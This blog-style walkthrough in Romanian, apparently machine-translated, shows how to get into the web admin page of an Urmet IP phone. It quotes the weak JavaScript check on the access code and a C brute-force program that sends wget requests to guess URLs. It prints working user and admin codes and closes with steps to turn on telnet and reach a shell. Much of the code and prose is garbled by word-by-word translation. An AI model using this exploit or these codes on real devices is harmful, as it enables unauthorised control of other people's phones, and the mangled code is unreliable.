Priam http://192.168.1.2:8080/ browser-ul de la pagina de autentificare si vom vedea un foarte subţire, probabil interfaţa web se face pentru depanare şi utilizate numai de către profesionişti (şi noi! )
O pagină cu o tastatură numerică pe care ne introduceţi un cod pentru a avea acces
La prima vedere nu-mi dă impresia de a fi în final în siguranţă.
Cum funcţionează
Având o privire la sursele am înţeles că de fiecare dată când am apăsaţi un buton cu o cifra Enter_code functie JavaScript este numit ()
24 var = 24 usermulcode 0 var cod = 0 1 Mul var = 1 0 cifre var = 0 0 var nu = 0 number ) { Enter_code funcţiei (număr) { 10 + number cod = codul * 10 + număr number Mul = Mul * numărul . value = code documentului codepad.. thecode. valoare = cod cifre + + digit == 8 ) { în cazul în care (cifre == 8) { mul == 40320 ) { dacă (mai multe == 40320) { ".html" Locul de amplasare = cod + ". html" } mul == 11907 ) { dacă (mai multe == 11907) { + code + ".html" Locul de amplasare = "admin" + + codul "html". } else { + + Nu cod = 0 mai multe = 1 cifră = 0 fails < 3 ) { în cazul în care (nu <3) { fails == 1 ) { în cazul în care (nu == 1) { . value = "Try again" documentului codepad.. thecode. value = "Încercaţi din nou" } fails == 2 ) { în cazul în care (nu == 2) { . value = "Last Time" documentului codepad.. thecode. value = "Ultima Ora" } } else { Locul de amplasare = "http://www.urmet.it" . value = "Bye!" documentului codepad.. thecode. value = "Pa!" } } } }
Privind la codul suntem capabili să ne dea o idee a operaţiunii. După care `Avem 3 incercari va fi redirecţionat către site-ul de Urmet. Codul pentru a intra este de 8 cifre, putem accesa cu două coduri, unul ne dă acces la un alt administrator şi utilizator normal. URL-ul care se deschide prin introducerea codului corect este format din codul de sine nu cunosc codul, deci, dacă nu ştim ce este. Prin aplicarea unei funcţii matematice privind cifrele sale, ca urmare a codului de la 40320 la 11907 `, si ghidul de acces ca administrator.
Cum a trebui să introduceţi
Un alt lucru pe care putem spune din JavaScript este că calcul a codului consideră că cifrele de pe tastatura, dar nu în ordinea în care le tastaţi astfel încât există mai multe coduri care să permită accesul, dar numai unul este cel potrivit, cu toate alt server va vom raspunde cu o eroare 404 (pagina nu a fost găsit.)
<stdio.h> # include # include # include <stdlib.h> calcola_mul ( v ) ; if ( finded_user == 0 && mul == user_access ) { sprintf ( cmd , "wget -q -O - http://%s/%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "User access code: " ) ; stampav ( v ) ; finded_user = 1 ; } return ; } if ( finded_admin == 0 && mul == admin_access ) { sprintf ( cmd , "wget -q -O - http://%s/Admin%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "Admin access code: sfârşitul termenului de recursia * / calcola_mul = Mul (v) în cazul în care (finded_user == 0 & & user_access == Mul) {sprintf (cmd ", wget-q-O - http://% s /% s.html> / dev / null ", ip, stampaCode (v)) în cazul în care (sistem (cmd) == 0) {printf (" codul de acces utilizator: "); stampav (v); finded_user = 1;} return;} if (= finded_admin = 0 & & Mul == admin_access) {sprintf (cmd, "wget-q-O - Admin% s http:// s.html /%> / dev / null", ip, stampaCode (v)) în cazul în care (sistem (cmd) == 0) {printf ("codul de acces Admin: % S <ip[:port]> <number_digits> <user_code>
După terminarea programului, putem rula şi de imprimare coduri de acces de pe ecran.
$ ./access 192.168.1.2:8080 8 40320 11907
User access code: 1 2 3 4 5 6 7 8
Admin access code: 1 9 7 1 1 3 9 7
Telefoanele ar trebui să fie toate la fel, astfel aceste coduri ar trebui să permită accesul la toată lumea. Am încercat, de asemenea, un alt telefon, cu o versiune de software diferite, caz în care cifrele au fost 10 în loc de 8 din Codul şi acolo a fost doar ghidul de admin, în acest caz, codul a fost de 1 9 7 1 1 3 9 7 2 7.
Suntem inch
Acum putem schimba configuraţia de telefon la vor.
Din faceţi clic pe Web pe "System Information" şi apoi faceţi clic din nou pe "Servicii optionale Net", astfel încât telefonul va porni un server telnet la care ne putem conecta doar cu comanda
telnet 192.168.1.2 23 rezultă într-o coajă frumos.
Distrează-te.
